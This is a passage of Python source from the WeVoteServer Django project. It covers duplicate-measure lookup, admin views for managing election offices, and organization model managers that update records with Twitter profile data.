filters = []
measure_list_found = False
try:
measure_queryset = ContestMeasure.objects.all()
measure_queryset = measure_queryset.filter(google_civic_election_id=google_civic_election_id)
# We don't look for office_we_vote_id because of the chance that locally we are using a
# different we_vote_id
# measure_queryset = measure_queryset.filter(contest_office_we_vote_id__iexact=office_we_vote_id)
# Ignore entries with we_vote_id coming in from master server
if positive_value_exists(we_vote_id_from_master):
measure_queryset = measure_queryset.filter(~Q(we_vote_id__iexact=we_vote_id_from_master))
# We want to find candidates with *any* of these values
if positive_value_exists(measure_title):
new_filter = Q(measure_title__iexact=measure_title)
filters.append(new_filter)
if positive_value_exists(measure_url):
new_filter = Q(measure_url__iexact=measure_url)
filters.append(new_filter)
if positive_value_exists(maplight_id):
new_filter = Q(maplight_id=maplight_id)
filters.append(new_filter)
if positive_value_exists(vote_smart_id):
new_filter = Q(vote_smart_id=vote_smart_id)
filters.append(new_filter)
# Add the first query
if len(filters):
final_filters = filters.pop()
# ...and "OR" the remaining items in the list
for item in filters:
final_filters |= item
measure_queryset = measure_queryset.filter(final_filters)
measure_list_objects = measure_queryset
if len(measure_list_objects):
measure_list_found = True
status = 'DUPLICATE_MEASURES_RETRIEVED'
success = True
else:
status = 'NO_DUPLICATE_MEASURES_RETRIEVED'
success = True
except ContestMeasure.DoesNotExist:
# No candidates found. Not a problem.
status = 'NO_DUPLICATE_MEASURES_FOUND_DoesNotExist'
measure_list_objects = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_possible_duplicate_measures ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
results = {
'success': success,
'status': status,
'google_civic_election_id': google_civic_election_id,
'measure_list_found': measure_list_found,
'measure_list': measure_list_objects,
}
return results
```
#### File: WeVoteServer/office/views_admin.py
```python
from .controllers import offices_import_from_master_server
from .models import ContestOffice
from .serializers import ContestOfficeSerializer
from admin_tools.views import redirect_to_sign_in_page
from candidate.models import CandidateCampaign, fetch_candidate_count_for_office
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.messages import get_messages
from django.shortcuts import render
from election.models import Election, ElectionManager
from exception.models import handle_record_found_more_than_one_exception,\
handle_record_not_found_exception, handle_record_not_saved_exception
from office.models import ContestOfficeListManager
from rest_framework.views import APIView
from rest_framework.response import Response
from voter.models import voter_has_authority
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
# This page does not need to be protected.
# NOTE: @login_required() throws an error. Needs to be figured out if we ever want to secure this page.
class OfficesSyncOutView(APIView):
def get(self, request, format=None):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
contest_office_list = ContestOffice.objects.all()
if positive_value_exists(google_civic_election_id):
contest_office_list = contest_office_list.filter(google_civic_election_id=google_civic_election_id)
serializer = ContestOfficeSerializer(contest_office_list, many=True)
return Response(serializer.data)
@login_required
def offices_import_from_master_server_view(request):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
state_code = request.GET.get('state_code', '')
results = offices_import_from_master_server(request, google_civic_election_id)
if not results['success']:
messages.add_message(request, messages.ERROR, results['status'])
else:
messages.add_message(request, messages.INFO, 'Offices import completed. '
'Saved: {saved}, Updated: {updated}, '
'Master data not imported (local duplicates found): '
'{duplicates_removed}, '
'Not processed: {not_processed}'
''.format(saved=results['saved'],
updated=results['updated'],
duplicates_removed=results['duplicates_removed'],
not_processed=results['not_processed']))
return HttpResponseRedirect(reverse('admin_tools:sync_dashboard', args=()) + "?google_civic_election_id=" +
str(google_civic_election_id) + "&state_code=" + str(state_code))
@login_required
def office_list_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
messages_on_stage = get_messages(request)
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
office_list_manager = ContestOfficeListManager()
updated_office_list = []
results = office_list_manager.retrieve_all_offices_for_upcoming_election(google_civic_election_id, True)
if results['office_list_found']:
office_list = results['office_list_objects']
for office in office_list:
office.candidate_count = fetch_candidate_count_for_office(office.id)
updated_office_list.append(office)
election_list = Election.objects.order_by('-election_day_text')
template_values = {
'messages_on_stage': messages_on_stage,
'office_list': updated_office_list,
'election_list': election_list,
'google_civic_election_id': google_civic_election_id,
}
return render(request, 'office/office_list.html', template_values)
@login_required
def office_new_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
office_list_manager = ContestOfficeListManager()
updated_office_list = []
results = office_list_manager.retrieve_all_offices_for_upcoming_election(google_civic_election_id, True)
if results['office_list_found']:
office_list = results['office_list_objects']
for office in office_list:
office.candidate_count = fetch_candidate_count_for_office(office.id)
updated_office_list.append(office)
messages_on_stage = get_messages(request)
template_values = {
'messages_on_stage': messages_on_stage,
'google_civic_election_id': google_civic_election_id,
'office_list': updated_office_list,
}
return render(request, 'office/office_edit.html', template_values)
@login_required
def office_edit_view(request, office_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
messages_on_stage = get_messages(request)
office_id = convert_to_int(office_id)
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
office_on_stage_found = False
try:
office_on_stage = ContestOffice.objects.get(id=office_id)
office_on_stage_found = True
except ContestOffice.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except ContestOffice.DoesNotExist:
# This is fine, create new
pass
if office_on_stage_found:
template_values = {
'messages_on_stage': messages_on_stage,
'office': office_on_stage,
'google_civic_election_id': google_civic_election_id,
}
else:
template_values = {
'messages_on_stage': messages_on_stage,
'google_civic_election_id': google_civic_election_id,
}
return render(request, 'office/office_edit.html', template_values)
@login_required
def office_edit_process_view(request):
"""
Process the new or edit office forms
:param request:
:return:
"""
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
office_id = convert_to_int(request.POST.get('office_id', 0))
office_name = request.POST.get('office_name', False)
google_civic_election_id = request.POST.get('google_civic_election_id', 0)
primary_party = request.POST.get('primary_party', False)
state_code = request.POST.get('state_code', False)
election_state = ''
if state_code is not False:
election_state = state_code
elif google_civic_election_id:
election_manager = ElectionManager()
results = election_manager.retrieve_election(google_civic_election_id)
if results['election_found']:
election = results['election']
election_state = election.get_election_state()
# Check to see if this office is already in the database
office_on_stage_found = False
try:
office_query = ContestOffice.objects.filter(id=office_id)
if len(office_query):
office_on_stage = office_query[0]
office_on_stage_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
try:
if office_on_stage_found:
# Update
# Removed for now: convert_to_int(office_on_stage.google_civic_election_id) >= 1000000 and
if office_name is not False:
office_on_stage.office_name = office_name
if primary_party is not False:
office_on_stage.primary_party = primary_party
if positive_value_exists(election_state):
office_on_stage.state_code = election_state
office_on_stage.save()
messages.add_message(request, messages.INFO, 'Office updated.')
google_civic_election_id = office_on_stage.google_civic_election_id
return HttpResponseRedirect(reverse('office:office_list', args=()) +
"?google_civic_election_id=" + google_civic_election_id)
else:
# Create new
office_on_stage = ContestOffice(
office_name=office_name,
google_civic_election_id=google_civic_election_id,
state_code=election_state,
)
# Removing this limitation: convert_to_int(office_on_stage.google_civic_election_id) >= 1000000 and
if primary_party is not False:
office_on_stage.primary_party = primary_party
office_on_stage.save()
messages.add_message(request, messages.INFO, 'New office saved.')
# Come back to the "Create New Office" page
return HttpResponseRedirect(reverse('office:office_new', args=()) +
"?google_civic_election_id=" + google_civic_election_id)
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
messages.add_message(request, messages.ERROR, 'Could not save office.')
return HttpResponseRedirect(reverse('office:office_list', args=()) +
"?google_civic_election_id=" + google_civic_election_id)
@login_required
def office_summary_view(request, office_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
messages_on_stage = get_messages(request)
office_id = convert_to_int(office_id)
office_on_stage_found = False
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
try:
office_on_stage = ContestOffice.objects.get(id=office_id)
office_on_stage_found = True
google_civic_election_id = office_on_stage.google_civic_election_id
except ContestOffice.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except ContestOffice.DoesNotExist:
# This is fine, create new
pass
try:
candidate_list = CandidateCampaign.objects.filter(contest_office_id=office_id)
if positive_value_exists(google_civic_election_id):
candidate_list = candidate_list.filter(google_civic_election_id=google_civic_election_id)
candidate_list = candidate_list.order_by('candidate_name')
except CandidateCampaign.DoesNotExist:
# This is fine, create new
pass
election_list = Election.objects.order_by('-election_day_text')
if office_on_stage_found:
template_values = {
'messages_on_stage': messages_on_stage,
'office': office_on_stage,
'candidate_list': candidate_list,
'election_list': election_list,
'google_civic_election_id': google_civic_election_id,
}
else:
template_values = {
'messages_on_stage': messages_on_stage,
}
return render(request, 'office/office_summary.html', template_values)
@login_required
def office_delete_process_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
office_id = convert_to_int(request.GET.get('office_id', 0))
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
office_on_stage_found = False
office_on_stage = ContestOffice()
try:
office_on_stage = ContestOffice.objects.get(id=office_id)
office_on_stage_found = True
google_civic_election_id = office_on_stage.google_civic_election_id
except ContestOffice.MultipleObjectsReturned as e:
pass
except ContestOffice.DoesNotExist:
pass
candidates_found_for_this_office = False
if office_on_stage_found:
try:
candidate_list = CandidateCampaign.objects.filter(contest_office_id=office_id)
# if positive_value_exists(google_civic_election_id):
# candidate_list = candidate_list.filter(google_civic_election_id=google_civic_election_id)
candidate_list = candidate_list.order_by('candidate_name')
if len(candidate_list):
candidates_found_for_this_office = True
except CandidateCampaign.DoesNotExist:
pass
try:
if not candidates_found_for_this_office:
# Delete the office
office_on_stage.delete()
messages.add_message(request, messages.INFO, 'Office deleted.')
else:
messages.add_message(request, messages.ERROR, 'Could not delete -- '
'candidates still attached to this office.')
return HttpResponseRedirect(reverse('office:office_summary', args=(office_id,)))
except Exception as e:
messages.add_message(request, messages.ERROR, 'Could not delete office -- exception.')
return HttpResponseRedirect(reverse('office:office_summary', args=(office_id,)))
return HttpResponseRedirect(reverse('office:office_list', args=()) +
"?google_civic_election_id=" + str(google_civic_election_id))
```
#### File: WeVoteServer/organization/models.py
```python
from django.db import models
from django.db.models import Q
from exception.models import handle_exception, \
handle_record_found_more_than_one_exception, handle_record_not_saved_exception
from import_export_twitter.functions import retrieve_twitter_user_info
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, extract_twitter_handle_from_text_string, positive_value_exists
from wevote_settings.models import fetch_next_we_vote_id_last_org_integer, fetch_site_unique_id_prefix
logger = wevote_functions.admin.get_logger(__name__)
class OrganizationManager(models.Manager):
"""
A class for working with the Organization model
"""
def create_organization_simple(self, organization_name, organization_website, organization_twitter_handle,
organization_email='', organization_facebook='', organization_image=''):
try:
organization = self.create(organization_name=organization_name,
organization_website=organization_website,
organization_twitter_handle=organization_twitter_handle,
organization_email=organization_email,
organization_facebook=organization_facebook,
organization_image=organization_image)
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
organization = Organization
return organization
def create_organization(self, organization_name, organization_website, organization_twitter_handle,
organization_email='', organization_facebook='', organization_image=''):
try:
organization = self.create(organization_name=organization_name,
organization_website=organization_website,
organization_twitter_handle=organization_twitter_handle,
organization_email=organization_email,
organization_facebook=organization_facebook,
organization_image=organization_image)
status = "CREATE_ORGANIZATION_SUCCESSFUL"
success = True
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
organization = Organization
status = "CREATE_ORGANIZATION_FAILED"
success = False
results = {
'success': success,
'status': status,
'organization': organization,
}
return results
def retrieve_organization_from_id(self, organization_id):
return self.retrieve_organization(organization_id)
def retrieve_organization_from_we_vote_id(self, organization_we_vote_id):
return self.retrieve_organization(0, organization_we_vote_id)
def retrieve_organization_from_vote_smart_id(self, vote_smart_id):
return self.retrieve_organization(0, '', vote_smart_id)
def retrieve_organization(self, organization_id, we_vote_id=None, vote_smart_id=None):
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
organization_on_stage = Organization()
organization_on_stage_id = 0
status = "ERROR_ENTERING_RETRIEVE_ORGANIZATION"
try:
if positive_value_exists(organization_id):
status = "ERROR_RETRIEVING_ORGANIZATION_WITH_ID"
organization_on_stage = Organization.objects.get(id=organization_id)
organization_on_stage_id = organization_on_stage.id
status = "ORGANIZATION_FOUND_WITH_ID"
elif positive_value_exists(we_vote_id):
status = "ERROR_RETRIEVING_ORGANIZATION_WITH_WE_VOTE_ID"
organization_on_stage = Organization.objects.get(we_vote_id=we_vote_id)
organization_on_stage_id = organization_on_stage.id
status = "ORGANIZATION_FOUND_WITH_WE_VOTE_ID"
elif positive_value_exists(vote_smart_id):
status = "ERROR_RETRIEVING_ORGANIZATION_WITH_VOTE_SMART_ID"
organization_on_stage = Organization.objects.get(vote_smart_id=vote_smart_id)
organization_on_stage_id = organization_on_stage.id
status = "ORGANIZATION_FOUND_WITH_VOTE_SMART_ID"
except Organization.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger)
error_result = True
exception_multiple_object_returned = True
status = "ERROR_MORE_THAN_ONE_ORGANIZATION_FOUND"
# logger.warn("Organization.MultipleObjectsReturned")
except Organization.DoesNotExist:
error_result = True
exception_does_not_exist = True
status += ", ORGANIZATION_NOT_FOUND"
# logger.warn("Organization.DoesNotExist")
organization_on_stage_found = True if organization_on_stage_id > 0 else False
results = {
'success': True if organization_on_stage_found else False,
'status': status,
'organization_found': organization_on_stage_found,
'organization_id':
organization_on_stage.id if organization_on_stage.id else organization_on_stage_id,
'we_vote_id':
organization_on_stage.we_vote_id if organization_on_stage.we_vote_id else we_vote_id,
'organization': organization_on_stage,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
}
return results
def fetch_organization_id(self, we_vote_id):
organization_id = 0
if positive_value_exists(we_vote_id):
organization_manager = OrganizationManager()
results = organization_manager.retrieve_organization(organization_id, we_vote_id)
if results['success']:
return results['organization_id']
return 0
def fetch_we_vote_id_from_local_id(self, organization_id):
if positive_value_exists(organization_id):
results = self.retrieve_organization(organization_id)
if results['organization_found']:
organization = results['organization']
return organization.we_vote_id
else:
return ''
else:
return ''
# We can use any of these four unique identifiers:
# organization.id, we_vote_id, organization_website, organization_twitter_handle
# Pass in the value if we want it saved. Pass in "False" if we want to leave it the same.
def update_or_create_organization(self, organization_id, we_vote_id,
organization_website_search, organization_twitter_search,
organization_name=False, organization_website=False,
organization_twitter_handle=False, organization_email=False,
organization_facebook=False, organization_image=False,
refresh_from_twitter=False):
"""
Either update or create an organization entry.
"""
exception_does_not_exist = False
exception_multiple_object_returned = False
organization_on_stage_found = False
new_organization_created = False
organization_on_stage = Organization()
status = "ENTERING_UPDATE_OR_CREATE_ORGANIZATION"
organization_id = convert_to_int(organization_id) if positive_value_exists(organization_id) else False
we_vote_id = we_vote_id.strip().lower() if we_vote_id else False
organization_website_search = organization_website_search.strip() if organization_website_search else False
organization_twitter_search = organization_twitter_search.strip() if organization_twitter_search else False
organization_name = organization_name.strip() if organization_name else False
organization_website = organization_website.strip() if organization_website else False
organization_twitter_handle = organization_twitter_handle.strip() if organization_twitter_handle else False
organization_email = organization_email.strip() if organization_email else False
organization_facebook = organization_facebook.strip() if organization_facebook else False
organization_image = organization_image.strip() if organization_image else False
# Values that can only be updated by a refresh_from_twitter
twitter_user_id = False
twitter_name = False
twitter_followers_count = False
twitter_profile_image_url_https = False
twitter_profile_banner_url_https = False
twitter_profile_background_image_url_https = False
twitter_description = False
twitter_location = False
twitter_url = False
# In order of authority
# 1) organization_id exists? Find it with organization_id or fail
# 2) we_vote_id exists? Find it with we_vote_id or fail
# 3) organization_website_search exists? Try to find it. If not, go to step 4
# 4) organization_twitter_search exists? Try to find it. If not, exit
success = False
if positive_value_exists(organization_id) or positive_value_exists(we_vote_id):
# If here, we know we are updating
# 1) organization_id exists? Find it with organization_id or fail
# 2) we_vote_id exists? Find it with we_vote_id or fail
organization_results = self.retrieve_organization(organization_id, we_vote_id)
if organization_results['success']:
organization_on_stage = organization_results['organization']
organization_on_stage_found = True
# Now that we have an organization to update, get supplemental data from Twitter if
# refresh_from_twitter is true
if positive_value_exists(organization_twitter_handle) and refresh_from_twitter:
results = retrieve_twitter_user_info(organization_twitter_handle)
if results['success']:
twitter_json = results['twitter_json']
if positive_value_exists(twitter_json['id']):
twitter_user_id = convert_to_int(twitter_json['id'])
if positive_value_exists(twitter_json['name']):
twitter_name = twitter_json['name']
# Use Twitter value if a value for this variable was NOT passed in
if not positive_value_exists(organization_name):
organization_name = twitter_json['name']
# TODO DALE Look more closely at saving the actual url from twitter (not the Twitter shortcut)
# if positive_value_exists(twitter_json['twitter_url']):
# # Use Twitter value if a value for this variable was NOT passed in
# if not positive_value_exists(organization_website):
# organization_website = twitter_json['twitter_url']
twitter_followers_count = convert_to_int(twitter_json['followers_count'])
if positive_value_exists(twitter_json['profile_image_url_https']):
twitter_profile_image_url_https = twitter_json['profile_image_url_https']
if 'profile_banner_url' in twitter_json:
twitter_profile_banner_url_https = twitter_json['profile_banner_url']
twitter_profile_background_image_url_https = \
twitter_json['profile_background_image_url_https']
twitter_description = twitter_json['description']
twitter_location = twitter_json['location']
value_changed = False
if organization_name or organization_website or organization_twitter_handle \
or organization_email or organization_facebook or organization_image:
value_changed = True
if organization_name:
organization_on_stage.organization_name = organization_name
if organization_website:
organization_on_stage.organization_website = organization_website
if organization_twitter_handle:
organization_on_stage.organization_twitter_handle = organization_twitter_handle
if organization_email:
organization_on_stage.organization_email = organization_email
if organization_facebook:
organization_on_stage.organization_facebook = organization_facebook
if organization_image:
organization_on_stage.organization_image = organization_image
if twitter_user_id or twitter_name or twitter_followers_count or twitter_profile_image_url_https \
or twitter_profile_banner_url_https or twitter_profile_background_image_url_https \
or twitter_description or twitter_location:
# Values that can only be added by a refresh_from_twitter
value_changed = True
if twitter_user_id:
organization_on_stage.twitter_user_id = twitter_user_id
if twitter_name:
organization_on_stage.twitter_name = twitter_name
if twitter_followers_count:
organization_on_stage.twitter_followers_count = twitter_followers_count
if twitter_profile_image_url_https:
organization_on_stage.twitter_profile_image_url_https = twitter_profile_image_url_https
if twitter_profile_banner_url_https:
organization_on_stage.twitter_profile_banner_url_https = twitter_profile_banner_url_https
if twitter_profile_background_image_url_https:
organization_on_stage.twitter_profile_background_image_url_https = \
twitter_profile_background_image_url_https
if twitter_description:
organization_on_stage.twitter_description = twitter_description
if twitter_location:
organization_on_stage.twitter_location = twitter_location
if value_changed:
organization_on_stage.save()
success = True
status = "SAVED_WITH_ORG_ID_OR_WE_VOTE_ID"
else:
success = True
status = "NO_CHANGES_SAVED_WITH_ORG_ID_OR_WE_VOTE_ID"
else:
status = "ORGANIZATION_COULD_NOT_BE_FOUND_WITH_ORG_ID_OR_WE_VOTE_ID"
else:
try:
found_with_status = ''
# 3) organization_website_search exists? Try to find it. If not, go to step 4
if positive_value_exists(organization_website_search):
try:
organization_on_stage = Organization.objects.get(
organization_website=organization_website_search)
organization_on_stage_found = True
found_with_status = "FOUND_WITH_WEBSITE"
except Organization.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger)
exception_multiple_object_returned = True
logger.warn("Organization.MultipleObjectsReturned")
except Organization.DoesNotExist as e:
# Not a problem -- an organization matching this twitter handle wasn't found
exception_does_not_exist = True
# 4) organization_twitter_search exists? Try to find it. If not, exit
if not organization_on_stage_found:
if positive_value_exists(organization_twitter_search):
try:
organization_on_stage = Organization.objects.get(
organization_twitter_handle=organization_twitter_search)
organization_on_stage_found = True
found_with_status = "FOUND_WITH_TWITTER"
except Organization.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger)
exception_multiple_object_returned = True
logger.warn("Organization.MultipleObjectsReturned")
except Organization.DoesNotExist as e:
# Not a problem -- an organization matching this twitter handle wasn't found
exception_does_not_exist = True
# 3 & 4) Save values entered in steps 3 & 4
if organization_on_stage_found:
# Now that we have an organization to update, get supplemental data from Twitter if
# refresh_from_twitter is true
if positive_value_exists(organization_twitter_handle) and refresh_from_twitter:
results = retrieve_twitter_user_info(organization_twitter_handle)
if results['success']:
twitter_json = results['twitter_json']
if positive_value_exists(twitter_json['id']):
twitter_user_id = convert_to_int(twitter_json['id'])
if positive_value_exists(twitter_json['name']):
twitter_name = twitter_json['name']
# Use Twitter value if a value for this variable was NOT passed in
if not positive_value_exists(organization_name):
organization_name = twitter_json['name']
twitter_followers_count = convert_to_int(twitter_json['followers_count'])
if positive_value_exists(twitter_json['profile_image_url_https']):
twitter_profile_image_url_https = twitter_json['profile_image_url_https']
if 'profile_banner_url' in twitter_json:
twitter_profile_banner_url_https = twitter_json['profile_banner_url']
twitter_profile_background_image_url_https = \
twitter_json['profile_background_image_url_https']
twitter_description = twitter_json['description']
twitter_location = twitter_json['location']
value_changed = False
if organization_name or organization_website or organization_twitter_handle \
or organization_email or organization_facebook or organization_image:
value_changed = True
if organization_name:
organization_on_stage.organization_name = organization_name
if organization_website:
organization_on_stage.organization_website = organization_website
if organization_twitter_handle:
organization_on_stage.organization_twitter_handle = organization_twitter_handle
if organization_email:
organization_on_stage.organization_email = organization_email
if organization_facebook:
organization_on_stage.organization_facebook = organization_facebook
if organization_image:
organization_on_stage.organization_image = organization_image
if twitter_user_id or twitter_name or twitter_followers_count or twitter_profile_image_url_https \
or twitter_profile_banner_url_https or twitter_profile_background_image_url_https \
or twitter_description or twitter_location:
# Values that can only be added by a refresh_from_twitter
value_changed = True
if twitter_user_id:
organization_on_stage.twitter_user_id = twitter_user_id
if twitter_name:
organization_on_stage.twitter_name = twitter_name
if twitter_followers_count:
organization_on_stage.twitter_followers_count = twitter_followers_count
if twitter_profile_image_url_https:
organization_on_stage.twitter_profile_image_url_https = twitter_profile_image_url_https
if twitter_profile_banner_url_https:
organization_on_stage.twitter_profile_banner_url_https = twitter_profile_banner_url_https
if twitter_profile_background_image_url_https:
organization_on_stage.twitter_profile_background_image_url_https = \
twitter_profile_background_image_url_https
if twitter_description:
organization_on_stage.twitter_description = twitter_description
if twitter_location:
organization_on_stage.twitter_location = twitter_location
if value_changed:
organization_on_stage.save()
success = True
status = found_with_status + " SAVED"
else:
success = True
status = found_with_status + " NO_CHANGES_SAVED"
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
if not organization_on_stage_found:
try:
# Now that we have an organization to update, get supplemental data from Twitter if
# refresh_from_twitter is true
if positive_value_exists(organization_twitter_handle) and refresh_from_twitter:
results = retrieve_twitter_user_info(organization_twitter_handle)
if results['success']:
twitter_json = results['twitter_json']
if positive_value_exists(twitter_json['id']):
twitter_user_id = convert_to_int(twitter_json['id'])
if positive_value_exists(twitter_json['name']):
twitter_name = twitter_json['name']
# Use Twitter value if a value for this variable was NOT passed in
if not positive_value_exists(organization_name):
organization_name = twitter_json['name']
twitter_followers_count = convert_to_int(twitter_json['followers_count'])
if positive_value_exists(twitter_json['profile_image_url_https']):
twitter_profile_image_url_https = twitter_json['profile_image_url_https']
if 'profile_banner_url' in twitter_json:
twitter_profile_banner_url_https = twitter_json['profile_banner_url']
twitter_profile_background_image_url_https = \
twitter_json['profile_background_image_url_https']
twitter_description = twitter_json['description']
twitter_location = twitter_json['location']
# If here, create new organization
results = Organization.objects.create_organization(organization_name, organization_website,
organization_twitter_handle, organization_email,
organization_facebook, organization_image)
if results['success']:
new_organization_created = True
success = True
status = "NEW_ORGANIZATION_CREATED_IN_UPDATE_OR_CREATE"
organization_on_stage = results['organization']
if twitter_user_id or twitter_name or twitter_followers_count or twitter_profile_image_url_https \
or twitter_profile_banner_url_https or twitter_profile_background_image_url_https \
or twitter_description or twitter_location:
# Values that can only be added by a refresh_from_twitter
if twitter_user_id:
organization_on_stage.twitter_user_id = twitter_user_id
if twitter_name:
organization_on_stage.twitter_name = twitter_name
if twitter_followers_count:
organization_on_stage.twitter_followers_count = twitter_followers_count
if twitter_profile_image_url_https:
organization_on_stage.twitter_profile_image_url_https = twitter_profile_image_url_https
if twitter_profile_banner_url_https:
organization_on_stage.twitter_profile_banner_url_https = twitter_profile_banner_url_https
if twitter_profile_background_image_url_https:
organization_on_stage.twitter_profile_background_image_url_https = \
twitter_profile_background_image_url_https
if twitter_description:
organization_on_stage.twitter_description = twitter_description
if twitter_location:
organization_on_stage.twitter_location = twitter_location
organization_on_stage.save()
status += " TWITTER_VALUES_RETRIEVED_AND_SAVED"
else:
success = False
status = results['status']
organization_on_stage = Organization
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
success = False
status = "NEW_ORGANIZATION_COULD_NOT_BE_CREATED"
organization_on_stage = Organization
results = {
'success': success,
'status': status,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'organization': organization_on_stage,
'new_organization_created': new_organization_created,
}
return results
def update_organization_social_media(self, organization, organization_twitter_handle=False,
organization_facebook=False):
"""
Update an organization entry with general social media data. If a value is passed in False
it means "Do not update"
"""
exception_does_not_exist = False
exception_multiple_object_returned = False
success = False
status = "ENTERING_UPDATE_ORGANIZATION_SOCIAL_MEDIA"
values_changed = False
organization_twitter_handle = organization_twitter_handle.strip() if organization_twitter_handle else False
organization_facebook = organization_facebook.strip() if organization_facebook else False
# organization_image = organization_image.strip() if organization_image else False
if organization:
if organization_twitter_handle:
if organization_twitter_handle != organization.organization_twitter_handle:
organization.organization_twitter_handle = organization_twitter_handle
values_changed = True
if organization_facebook:
if organization_facebook != organization.organization_facebook:
organization.organization_facebook = organization_facebook
values_changed = True
if values_changed:
organization.save()
success = True
status = "SAVED_ORG_SOCIAL_MEDIA"
else:
success = True
status = "NO_CHANGES_SAVED_TO_ORG_SOCIAL_MEDIA"
results = {
'success': success,
'status': status,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'organization': organization,
}
return results
def update_organization_twitter_details(self, organization, twitter_json):
"""
Update an organization entry with details retrieved from the Twitter API.
"""
success = False
status = "ENTERING_UPDATE_ORGANIZATION_TWITTER_DETAILS"
values_changed = False
if organization:
if positive_value_exists(twitter_json['id']):
if convert_to_int(twitter_json['id']) != organization.twitter_user_id:
organization.twitter_user_id = convert_to_int(twitter_json['id'])
values_changed = True
if positive_value_exists(twitter_json['screen_name']):
if twitter_json['screen_name'] != organization.organization_twitter_handle:
organization.organization_twitter_handle = twitter_json['screen_name']
values_changed = True
if positive_value_exists(twitter_json['name']):
if twitter_json['name'] != organization.twitter_name:
organization.twitter_name = twitter_json['name']
values_changed = True
if positive_value_exists(twitter_json['followers_count']):
if convert_to_int(twitter_json['followers_count']) != organization.twitter_followers_count:
organization.twitter_followers_count = convert_to_int(twitter_json['followers_count'])
values_changed = True
if positive_value_exists(twitter_json['profile_image_url_https']):
if twitter_json['profile_image_url_https'] != organization.twitter_profile_image_url_https:
organization.twitter_profile_image_url_https = twitter_json['profile_image_url_https']
values_changed = True
if 'profile_banner_url' in twitter_json and positive_value_exists(twitter_json['profile_banner_url']):
if twitter_json['profile_banner_url'] != organization.twitter_profile_banner_url_https:
organization.twitter_profile_banner_url_https = twitter_json['profile_banner_url']
values_changed = True
if positive_value_exists(twitter_json['profile_background_image_url_https']):
if twitter_json['profile_background_image_url_https'] != \
organization.twitter_profile_background_image_url_https:
organization.twitter_profile_background_image_url_https = \
twitter_json['profile_background_image_url_https']
values_changed = True
if positive_value_exists(twitter_json['description']):
if twitter_json['description'] != organization.twitter_description:
organization.twitter_description = twitter_json['description']
values_changed = True
if positive_value_exists(twitter_json['location']):
if twitter_json['location'] != organization.twitter_location:
organization.twitter_location = twitter_json['location']
values_changed = True
if values_changed:
organization.save()
success = True
status = "SAVED_ORG_TWITTER_DETAILS"
else:
success = True
status = "NO_CHANGES_SAVED_TO_ORG_TWITTER_DETAILS"
results = {
'success': success,
'status': status,
'organization': organization,
}
return results
def clear_organization_twitter_details(self, organization):
"""
Update an organization entry with details retrieved from the Twitter API.
"""
success = False
status = "ENTERING_UPDATE_ORGANIZATION_TWITTER_DETAILS"
if organization:
organization.twitter_user_id = 0
# We leave the handle in place
# organization.organization_twitter_handle = ""
organization.twitter_name = ''
organization.twitter_followers_count = 0
organization.twitter_profile_image_url_https = ''
organization.twitter_description = ''
organization.twitter_location = ''
organization.save()
success = True
status = "CLEARED_ORG_TWITTER_DETAILS"
results = {
'success': success,
'status': status,
'organization': organization,
}
return results
def delete_organization(self, organization_id):
organization_id = convert_to_int(organization_id)
organization_deleted = False
try:
if organization_id:
results = self.retrieve_organization(organization_id)
if results['organization_found']:
organization = results['organization']
organization_id = organization.id
organization.delete()
organization_deleted = True
except Exception as e:
handle_exception(e, logger=logger)
results = {
'success': organization_deleted,
'organization_deleted': organization_deleted,
'organization_id': organization_id,
}
return results
class OrganizationListManager(models.Manager):
"""
A class for working with lists of Organizations
"""
def organization_search_find_any_possibilities(self, organization_name, organization_twitter_handle='',
organization_website='', organization_email='',
organization_facebook=''):
"""
We want to find *any* possible organization that includes any of the search terms
:param organization_name:
:param organization_twitter_handle:
:param organization_website:
:param organization_email:
:param organization_facebook:
:return:
"""
organization_list_for_json = {}
try:
filters = []
organization_list_for_json = []
organization_objects_list = []
if positive_value_exists(organization_name):
